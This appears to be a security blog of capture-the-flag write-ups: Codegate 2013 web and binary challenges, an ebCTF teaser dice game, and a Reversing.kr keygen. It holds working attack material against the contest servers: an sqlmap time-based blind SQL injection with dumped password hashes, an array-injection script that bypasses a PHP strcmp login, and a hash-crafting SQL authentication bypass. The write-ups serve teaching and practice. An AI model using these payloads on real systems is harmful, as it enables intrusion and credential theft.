$('input[value=\\+]').click(function(){var $x=$(this).parent().parent().find('td[id]');if(parseInt($x.html())<100 && point!=0){$x.html(parseInt($x.html())+1);point-=1;}viewpoint();});
<?php
if (isset($row[0])) {
echo "var str = ".$row['status.str'].";";
echo "var dex = ".$row['status.dex'].";";
echo "var int = ".$row['status.int'].";";
?>
point = 150-(str+dex+int);
$('#str').html(str);
$('#dex').html(dex);
$('#int').html(int);
<?php
}
?>
viewpoint();
});
function viewpoint(){ $('#mod').html(point); }
function chk(f) {
f.str.value = $('#str').html();f.dex.value = $('#dex').html();f.int.value = $('#int').html(); return true;}
</script>
</head>
<body class="single">
<div class="wrap">
<header>
<div class="logo">
<img src="images/character.png" alt="logo by mobifreaks"/>
<span class="title"><span><?php echo $_SESSION['scrap']; ?></span></span>
</div>
</header>
<div class="content">
<article>
<section class="head">
<h3>Point : <span id="mod"></span></h3>
section>
<section>
<form action="simulator_ok.php" method="post" class="label-top" onsubmit='return chk(this);'>
<div>
<table>
<tr>
<td style="width:50px;"><h4>STR</h4></td>
<td id="str" style="width:50px;color:red;">0</td>
<td><input type="button" value="-" />&nbsp;&nbsp;</td>
<td><input type="button" value="+" /></td>
<tr>
<tr>
<td style="width:50px;"><h4>DEX</h4></td>
<td id="dex" style="width:50px;color:green;">0</td>
<td><input type="button" value="-" />&nbsp;&nbsp;</td>
<td><input type="button" value="+" /></td>
<tr>
<tr>
<td style="width:50px;"><h4>INT</h4></td>
<td id="int" style="width:50px;color:blue;">0</td>
<td><input type="button" value="-" />&nbsp;&nbsp;</td>
<td><input type="button" value="+" /></td>
<tr>
</table>
</div>
<div>
memo : <input type='text' name='memo' value='<?php if (isset($row[0])) echo gzuncompress($row['memo.memo']); ?>' maxlength=32 />
</div>
<div>
<input type="submit" value="Save" />&nbsp;&nbsp;
<input type="button" value="Exit" onClick="location.replace('./index.php')" />&nbsp;&nbsp;
</div>
<input type='hidden' name='str'>
<input type='hidden' name='dex'>
<input type='hidden' name='int'>
</form>
</section>
</article>
</div>
</div>
</body>
</html>
</body>
</html>
view raw codegate2013_web5_2.html hosted with ❤ by GitHub
  1. Line 15: if ($_POST['name'] == “GM”) die(“you can not view&save with ‘GM’”);
    There was a restriction with using “GM” as the character name. GM probably stands for Game Master.
  2. Line 17: $db = sqlite_open(“/var/game_db/gamesim_”.$_SESSION['scrap'].”.db”);
    The path to the character database file!
  3. Line 94: memo : <input type=’text’ name=’memo’ value=’<?php if (isset($row[0])) echo gzuncompress($row['memo.memo']); ?>’ maxlength=32 />
    Data contained within memo.memo must be uncompressed.
The search for /var/game_db/gamesim_GM.db was conducted and it was discovered to be an SQLite 2.1 database.


After the SQLite database file was extracted from the response, the next step was to write a script to read the contents from it. Recall from hint #3 above, memo.memo must be uncompressed in order to recover its original data.

Script to read database contents:
<?php
$db = sqlite_open("gamesim_GM.db");
$row = sqlite_fetch_array(sqlite_query($db,"select 1 from sqlite_master"));
if (isset($row[0])) {
$row = sqlite_fetch_array(sqlite_query($db,"select * from status left join memo on status.time = memo.time order by status.time desc limit 1;"));
}
if (isset($row[0]))
echo gzuncompress($row['memo.memo']);
?>
view raw codegate2013_web5_3.php hosted with ❤ by GitHub

Key found! 500 points in the bag. Yay!


Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Web #3 (300 points)

This was the third challenge under the web category which was worth 300 points. The challenge began with a letter addressed to Sherlock Holmes.
Dear Sherlock.
Our company is hacked. We must catch a criminal!
We found a clue 'the grey' in investigation, and we detected this site through the clue.
http://58.229.122.17:2218
I guess it seems hacker group's hideout.
But...I can't find any clues to the eye.
I need your help, Sherlock.
We must figure out when, who asks this.
From Hound Co.,Ltd. CEO K.B.
Certification Form -> NAME(YYYY-MM-DD)
view raw codegate2013_web3_1.txt hosted with ❤ by GitHub
The objective of this challenge was to play the role of Sherlock Holmes and to figure out who and when the person asked the hacker group to hack “Hound Co.,Ltd.”.

Examination of the site revealed there was a suspicious Javascript file secret.js which was the first lead gathered for this challenge. However the code was clearly obfuscated as shown below. 

Contents of secret.js:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(4).8(2(){5 1=0;$(\'a.6\').7(2(){1++;3(1==9){$(\'#b\').c({d:\'.e\',f:\'./g.h\'});1=0}})});',18,18,'|cnt|function|if|document|var|S|click|ready|10||popup|bPopup|contentContainer|content|loadUrl|d56b699830e77ba53855679cb1d252da|php'.split('|'),0,{}))
view raw codegate2013_web3_2.js hosted with ❤ by GitHub
The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)
$(document).ready(function () {
var cnt = 0;
$('a.S').click(function () {
cnt++;
if (cnt == 10) {
$('#popup').bPopup({
contentContainer: '.content',
loadUrl: './d56b699830e77ba53855679cb1d252da.php'
});
cnt = 0
}
})
});
view raw codegate2013_web3_3.js hosted with ❤ by GitHub
Line 8 of this Javascript exposed the hidden php file, d56b699830e77ba53855679cb1d252da.php, which was revealed as a popup after the “Grey” logo was clicked for 10 times. In fact this was the login form. The challenge would be to find the login credentials to gain access to the restricted area.

Candy: md5(login) = d56b699830e77ba53855679cb1d252da

Examination of the site did not show any obvious sign of possible SQL injection flaw. Do you know of any tools that can assist you to look for such flaws?


There are several tools that can automate the process of detecting and exploiting SQL injection flaws and sqlmap, an open source penetration testing tool, is the tool widely used for this purpose.

Command used to identify time-based blind sqli with parameter “question”:
python sqlmap.py -u "http://58.229.122.17:2218/contact.php" --data="your_name=djteddy&your_email=djteddy@djteddy.com&question=1&your_message=djteddy&contact_submitted=send"
view raw codegate2013_web3_4.py hosted with ❤ by GitHub
Subsequently commands were issued to identify the databases, tables and table entries:
sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
---
Place: POST
Parameter: question
Type: AND/OR time-based blind
Title: MySQL &gt; 5.0.11 AND time-based blind
Payload: your_name=djteddy&amp;your_email=djteddy@djteddy.com&amp;question=1 AND SLEEP(5)&amp;your_message=djteddy&amp;contact_submitted=send
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] test
[*] the_grey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: question
Type: AND/OR time-based blind
Title: MySQL &gt; 5.0.11 AND time-based blind
Payload: your_name=djteddy&amp;your_email=djteddy@djteddy.com&amp;question=1 AND SLEEP(5)&amp;your_message=djteddy&amp;contact_submitted=send
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: the_grey
[2 tables]
+---------+
| contact |
| member |
+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: question
Type: AND/OR time-based blind
Title: MySQL &gt; 5.0.11 AND time-based blind
Payload: your_name=djteddy&amp;your_email=djteddy@djteddy.com&amp;question=1 AND SLEEP(5)&amp;your_message=djteddy&amp;contact_submitted=send
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: question
Type: AND/OR time-based blind
Title: MySQL &gt; 5.0.11 AND time-based blind
Payload: your_name=djteddy&amp;your_email=djteddy@djteddy.com&amp;question=1 AND SLEEP(5)&amp;your_message=djteddy&amp;contact_submitted=send
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: the_grey
Table: member
[5 entries]
+---------+------+-------------------------------------+
| id | `no` | password |
+---------+------+-------------------------------------+
| flash | 5 | c13367945d5d4c91047b3b50234aa7ab |
| leopard | 2 | 4bad0b8dd3074cd43f641c2ac22a3571 |
| victor | 4 | b36d331451a61eb2d76860e00c347396 |
| warlord | 3 | 3567ff1f203d44d817e03d3660602a12 |
| zodiac | 1 | cb2b0f9f531fd890c27af0951062d7f7 |
+---------+------+-------------------------------------+
view raw codegate2013_web3_5.txt hosted with ❤ by GitHub
Put the passwords through md5 decrypter to be decrypted:
+---------+----------------------------------+-------------+
| id | password hash | password |
+---------+----------------------------------+-------------+
| flash | c13367945d5d4c91047b3b50234aa7ab | code |
| leopard | 4bad0b8dd3074cd43f641c2ac22a3571 | runner |
| victor | b36d331451a61eb2d76860e00c347396 | killer |
| warlord | 3567ff1f203d44d817e03d3660602a12 | [Not Found] |
| zodiac | cb2b0f9f531fd890c27af0951062d7f7 | [Not Found] |
+---------+----------------------------------+-------------+
view raw codegate2013_web3_6.txt hosted with ❤ by GitHub
Logged in with the credentials for victor and solved the mystery! 300 points in the bag. Yay!

Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Web #2 (200 points)

This was the second challenge under the web category which was worth 200 points. It began with a short note from the organizer that read – “One Time Password..?” and a hyperlink to a Ca$h website where Captain Teemo was on duty.


The Ca$h website included the option to generate a One Time Password (OTP) that was needed during login. Option to download the (zipped) source code for the website was also available.

Contents of the zipped file:
  • index.html – Website index page
  • jquery-1.8.3.js – JQuery file
  • main.js – JQuery file
  • images – Folder containing css and image files
  • home.php – Homepage containing some description for the website
  • login.php – Login page
  • login_ok.php – Check the login credentials submitted
  • otp.php – Display the OTP and its validity period
  • otp_util.php – OTP generation page

Contents of “login_ok.php”:
<?php
include("./otp_util.php");
$flag = file_get_contents($flag_file);
if (isset($_POST["id"]) && isset($_POST["ps"])) {
$password = make_otp($_POST["id"]);
sleep(3); // do not bruteforce
if (strcmp($password, $_POST["ps"]) == 0) {
echo "welcome, <b>".$_POST["id"]."</b><br />";
echo "<input type='button' value='back' onclick='history.back();' />";
if ($_POST["id"] == "127.0.0.1") {
echo "<hr /><b>".$flag."</b><br />";
}
} else {
echo "<script>alert('login failed..');history.back();</script>";
}
}
?>
view raw codegate2013_web2_1.php hosted with ❤ by GitHub
Contents of “otp.php”:
<div class="panel" align="justify">
<span class="orangetitle">your password</span>
<span class="bodytext"><br />
<?php
include("./otp_util.php");
echo "<br />";
echo "<br />";
echo "your ID : <b>".$_SERVER["REMOTE_ADDR"]."</b>";
echo "<br />";
echo "<br />";
echo "your password : <b>".make_otp($_SERVER["REMOTE_ADDR"])."</b>";
echo "<br />";
echo "<br />";
$time = 20 - (time() - ((int)(time()/20))*20);
echo "you can login with this password for <b>$time secs</b>.";
?>
</span>
</div>
view raw codegate2013_web2_2.php hosted with ❤ by GitHub
Contents of “otp_util.php”:
<?php
$flag_file = "/flag.txt";
function make_otp($user) {
// acccess for 20secs.
$time = (int)(time()/20);
$seed = md5(file_get_contents($flag_file)).md5($_SERVER['HTTP_USER_AGENT']);
$password = sha1($time.$user.$seed);
return $password;
}
?>
view raw codegate2013_web2_3.php hosted with ❤ by GitHub
From login_ok.php, it appears you need to submit a password value that matches the value generated by make_otp() and “127.0.0.1″ as the ID value in order to capture the flag for this challenge. A closer look at make_otp() reveals the OTP value is a sha1 hash of a string that is formed by concatenating $time (integer value of the current time divided by 20), $user (“127.0.0.1″), and $seed (md5 hash of the flag file contents concatenate with the md5 hash of the user-agent header) together.

One Time Password (Valid for 20 secs)

There are 2 obstacles to overcome. Let’s examine them in details here:
  1. $_SERVER["REMOTE_ADDR"]The IP address from which you are viewing the current page.
    Are you able to spoof this to be “127.0.0.1″?
  2. $_SERVER['HTTP_USER_AGENT']Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent being which is accessing the page.
    Are you able to match whatever string value used by the organizer?
Take a moment to think about overcoming these 2 obstacles and whether there is an alternative approach to this challenge.

  1. $_SERVER["REMOTE_ADDR"] – Even though it is possible to spoof this element with “127.0.0.1″, chances are you will not receive the response as the IP address is used in the IP protocol to route packets.
  2. $_SERVER['HTTP_USER_AGENT'] – It’s anybody’s guess what string was used by the organizer. It may be empty or random.
The 2 obstacles certainly look difficult to overcome. Another approach lies in line 10 of login_ok.php where $_POST["ps"] is compared against $password to determine if there is a match. Comparison between two strings will result in an error when one of the strings supplied is an array. This attack is known as array injection.

Array Injection PHP Script:
<?php
$server = '58.229.122.15';
$port = 31338;
$fp = fsockopen($server, $port, $errno, $errstr);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$postdata = 'id=127.0.0.1&ps[]=codegate';
$request = "POST http://$server:$port/site/page/login_ok.php HTTP/1.1\r\n";
$request .= "Host: $server:$port\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: " . strlen($postdata) . "\r\n";
$request .= "\r\n";
$request .= $postdata;
fwrite($fp, $request);
echo fread($fp, 4096);
fclose($fp);
}
?>
view raw codegate2013_web2_4.php hosted with ❤ by GitHub
When the script (login_ok.php) received this POST request, it ran into an error, rendered the strcpy defunct and echoed the code within the scope of the if statement, together with the contents of the flag file! 200 points in the bag. Yay!

Flag Captured:

Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Web #1 (100 points)

This was the first challenge under the web category which was worth 100 points. It began with a short note from the organizer that read – “Let’s swimming!” and a hyperlink to a member login page which included the option to download the (zipped) source code for the website.


Contents of the zipped file:
  • login.php_files – Folder containing css and image files
  • db_schema.sql – Database schema file
  • login.php.htm – Member login page
  • login_check.php – PHP page to check the ID & password entered against the database entry

Contents of “db_scheme.sql”:
create table users(
idx int auto_increment primary key,
user_id varchar(32) unique not null,
user_ps char(64) not null
);
insert into users values (null, 'admin', 'f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f');
view raw codegate2013_web100_1.sql hosted with ❤ by GitHub

Contents of “login_check.php”:
<?php
if (!isset($_POST['user_id']) || !isset($_POST['password'])){
die("parameter error");
}
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
if ($row['user_id'] == "admin") {
echo "hello, admin<br />";
die(file_get_contents($flag));
} else {
die("hello, ".$row['user_id']);
}
} else {
msg("login failed..");
}
function msg($msg){
echo "<script>";
echo "alert('$msg');";
echo "history.back();";
echo "</script>";
}
?>
view raw codegate2013_web100_2.php hosted with ❤ by GitHub

In order to capture the flag for this challenge, you will need to gain access as “admin” so that the contents of “flag.txt” will be read and displayed.

The ID ($id) and password ($ps) values that are submitted to the form will be passed through the mysql_real_escape_string() function to escape special characters. A whirlpool hash for the password value will be calculated thereafter.

It is important to note that when the 3rd parameter for hash() is set to TRUE, the function outputs raw binary data as oppose to lowercase hexits when the parameter is set to FALSE. What this means is that you should not bother to perform bruteforce against the stored password value of ‘f0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0f’ cos it’s fruitless to do so.

The objective is to carefully craft a password value that will create a hash value that can nullify the user_ps parameter and gain admin access! How can you achieve that objective? Take some time to think about this before reading on.


Well to achieve that, you need to make use of type conversion during SQL expression evaluation. With type conversion, in particular string conversion to integer, you need to ensure hash() outputs a string value that matches this format (string1′=’string2). When $ps = string1′=’string2, the SQL statement becomes (select * from users where user_id=’$id’ and user_ps=’string1′=’string2′)

SQL expression evaluation will try to convert string1 and string2 to integer but as they are not integers, they will be cast to 0. Doing an equal comparison between two zeroes will evaluate to TRUE, thus making the latter part of the SQL statement to be TRUE and return all data associated with “admin”. The next step is to create a script to compute passwords that can satisfy the format for this attack to be successful.

Passwords Generation Script:
<?php
set_time_limit(0);
for ( $i = 1; $i <= 5000000; $i++ ) {
$digest = hash("whirlpool", $i, true);
if (strpos($digest, "'='") != 0)
echo $i . " :: " . $digest . "<br>\n";
}
?>
view raw codegate2013_web100_3.php hosted with ❤ by GitHub

Passwords Generated:

Using admin and 4075629 as the login credentials will grant you access as admin and have the flag revealed! 100 points in the bag. Yay!

Flag Captured:

Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Binary #1 (100 points)

The 1st challenge under the binary category, worthy of 100 points, kicked off with a binary executable given to participants. Through the use of PEiD, the binary was identified to be a “Microsoft Visual C# / Basic .NET” file. Execution of the binary showed it was a simulation program for a door lock.


As no hint was given for the challenge, the next step would be to put the binary through .NET Reflector to decompile and analyse the code. Out of the 13 objects listed in the object browser, 12 were system-related objects. All focus was on the only remaining object “Crack_Test”.


Although Crack_Test contained several methods, there was one particular method that stood out from the rest – void TransFormable(string).

public void TransFormable(string Data)
{
if (Data.Length == 0x10)
{
if (this.xorToString(AESCrypt.Encrypt(this.r.Text, KeyValue)) == this.lowkey)
{
MessageBox.Show(AESCrypt.Decrypt(this.StringToXOR(this.a.ByteTostring_t(this.c)), KeyValue));
}
else
{
MessageBox.Show("Do you know ? " + AESCrypt.Decrypt(this.StringToXOR(this.a.ByteTostring_t(this.d)), KeyValue));
}
}
}
view raw codegate2013_binary100_1.c hosted with ❤ by GitHub
As observed in line 5 & 7, if the two strings matched, a message box would be shown with a decrypted string which might be the flag for this challenge. Gathering data and function code used for decryption within TransFormable() became the next step towards the goal. 

static Crack_Game()
{
KeyValue = "9e2ea73295c7201c5ccd044477228527";
}
public Crack_Game()
{
this.a = new StringCrypt();
this.lowkey = "@DT$:~zRbD_!qFWQMAtC's[_t:&&YF\x007fWQE ^o-EBAr%(";
this.c = new byte[] {
0x3f, 30, 0x39, 0x2f, 20, 0x4e, 50, 0x36, 0x33, 5, 0x25, 0x29, 0x52, 40, 0x45, 30,
0x2a, 0x38, 0x24, 0x49, 60, 0x44, 0x4f, 0x56, 0x18, 0x49, 0x4c, 0x13, 9, 0x1b, 0x2a, 4,
0x52, 0x2a, 0x1c, 0x56, 0x4f, 11, 0x11, 0x3f, 0x17, 14, 0x30, 0x40
};
this.d = new byte[] {
0x16, 0x34, 4, 0x48, 40, 0x12, 0x29, 0x16, 0x17, 0x2d, 0x15, 0x1c, 0x2a, 0x3f, 0x17, 0x31,
0x4b, 0x4c, 0x27, 5, 9, 13, 8, 0x2b, 0x25, 0x3b, 0x2a, 0x2d, 5, 0x30, 10, 0x2f,
7, 0x2a, 12, 0x29, 20, 0x4f, 0x25, 0x2e, 0x27, 0x1f, 0x1a, 0x40
};
this.Shadowkey = string.Empty;
this.e = null;
this.a();
this.r.MaxLength = 0x19;
}
public static string Decrypt(string textToDecrypt, string key)
{
RijndaelManaged managed = new RijndaelManaged {
Mode = CipherMode.CBC,
Padding = PaddingMode.PKCS7,
KeySize = 0x100,
BlockSize = 0x100
};
byte[] inputBuffer = Convert.FromBase64String(textToDecrypt);
byte[] bytes = Encoding.UTF8.GetBytes(key);
byte[] destinationArray = new byte[0x20];
int length = bytes.Length;
Array.Copy(bytes, destinationArray, length);
managed.Key = destinationArray;
managed.IV = destinationArray;
byte[] buffer4 = managed.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
return Encoding.UTF8.GetString(buffer4);
}
public string StringToXOR(string data)
{
byte[] bt = new byte[data.Length];
bt = this.stringTobyte(data);
for (int i = 0; i < bt.Length; i++)
{
bt[i] = (byte) (bt[i] ^ 0x25);
bt[i] = (byte) (bt[i] ^ 0x58);
}
return this.ByteTostring(bt);
}
view raw codegate2013_binary100_2.c hosted with ❤ by GitHub
With the above information gathered, a simple PHP was written to perform the decryption based on Rijndael cipher.

<?php
$c = array(0x3f, 30, 0x39, 0x2f, 20, 0x4e, 50, 0x36, 0x33, 5, 0x25, 0x29, 0x52, 40, 0x45, 30,
0x2a, 0x38, 0x24, 0x49, 60, 0x44, 0x4f, 0x56, 0x18, 0x49, 0x4c, 0x13, 9, 0x1b, 0x2a, 4,
0x52, 0x2a, 0x1c, 0x56, 0x4f, 11, 0x11, 0x3f, 0x17, 14, 0x30, 0x40);
for ( $i = 0; $i < count($c); $i++ )
$c[$i] = chr($c[$i] ^ 0x25 ^ 0x58);
$textToDecrypt = utf8_decode(implode("", $c));
$alg = MCRYPT_RIJNDAEL_256;
$mode = MCRYPT_MODE_CBC;
$keyvalue = '9e2ea73295c7201c5ccd044477228527';
$bytes = utf8_encode($keyvalue);
$iv = $key = $bytes;
$flag = mcrypt_decrypt($alg, $key, base64_decode($textToDecrypt),$mode, $iv);
echo "Flag: " . $flag;
?>
view raw codegate2013_binary100_3.php hosted with ❤ by GitHub
And the flag was captured! 100 points in the bag!!  Yay!

Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Sunday, June 2, 2013

ebCTF 2013 Teaser - Dice Game (100pts)

Yesterday De Eindbazen organised a preview of their CTF and they called it a teaser. :D

To be honest, all the challenges are quite fun but the "Teaser" lasted only 8hrs and most of my team are busy.
I didn't solve this during the 8hrs as i was busy as well. I've got time this morning to start looking at it and "Oh boy". It's definitely good challenges.

Given Hints:
Challenge BIN100 “Dice Game”

Beat our dice game and get the flag.

This is the backup of the original file:
ebCTF-Teaser-BIN100-Dice.zip

Required Tools:
IDA Pro
Protection iD
ASM OPCodes Reference

Initial Analysis:
Usually before i start to reverse any binary, i would normally checked using PiD on whether is the binary packed.

Figure 1: Using ProtectioniD to scan for packer

The results showed that it's most probably not packed by any known packers.

Now let's start to run the application and see what does it do.

Figure 2: Initial startup of Dice Game.exe

Ok, it seems to want us to roll a 3. But usually such binaries which require us to get certain numbers or sequence will not be easy. Let's load it up with IDA Pro and further analyse it.
If we look carefully at the "Strings subview", we can guess that the sequence of this dice game is to get 3-1-3-3-7 based on the screenshot below.

Figure 3: Strings subview from IDA Pro

Ok, let's check the CFG (Control Flow Graph) on where are the checks for 3-1-3-3-7

Further Analysis:
Ok, i've found my 1st check at loc_4018B5 as shown here.

Figure 4: 1st Check for 3

Since the chances of getting a 3 is 1 out of 6. What you can do is simply patched the instruction from "JNZ" to "JZ" and do it for the rest of the checks.
You can use IDA Pro's "Edit->Patch Program->Change Bytes" feature to do that.
After you are done, simply do "Edit->Patch Program->Apply Patches to Input File..." and save it.

Then finally, run the newly patched .exe and you should get this.

Figure 5: Final flag

The flag for this challenge is ebCTF{64ec47ece868ba34a425d90044cd2dec}

cheers
0x4a61636f62
Posted by at No comments:
Labels: , , ,

Saturday, June 1, 2013

Reversing.kr - Easy Keygen (100pts)

You can register and download this file here.
http://reversing.kr/download.php?n=2
Alternatively, i've uploaded a copy of it here:
Easy_KeygenMe.zip

Given Hints:
ReversingKr KeygenMe


Find the Name when the Serial is 5B134977135E7D13


Required Tools:
IDA Pro

Initial Analysis:
Let's load the binary with IDA Pro.
You will see something like the image below.


It seems to me that the username is 8 characters and there is an int array containing 16,32 & 48.
Let's move further down the CFG (Control-Flow Graph) and analyse further and we get something like this.


It's probably clearer now that every character in the user's supplied username is being XOR-ed with the int array.
Since the given hints is to find the Name when the Serial is 5B134977135E7D13 and we know that every character is being XOR-ed with the int array.
Let's XOR-ed back the given serial to find the username.

Conclusion:
From the information which we have gathered so far. Our pseudo code will look something like this.
int iNum[3] = {16,32,48};
int iCounter = 0;
int i=0;
char dest[3];
char *szSerial = "5B134977135E7D13";
char *szUserName;

szUserName = (char*)calloc(9,sizeof(char));
for( i=0; i<strlen(szSerial); iCounter++, i+=2 ){
if( iCounter==3 ){
iCounter = 0;
}
strncpy_s( dest, _countof(dest), &szSerial[i], 2);
dest[2] = '\0';
sprintf_s(szUserName, 9,"%s%c", szUserName, strtol(dest, NULL, 16)^iNum[iCounter]);
}
printf("Original username: %s\n", szUserName);

Eventually, you will see what is the original username that will match 5B134977135E7D13 is "K3yg3nm3"

I hope that it's a simple to understand solution.

cheers
0x4a61636f62
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)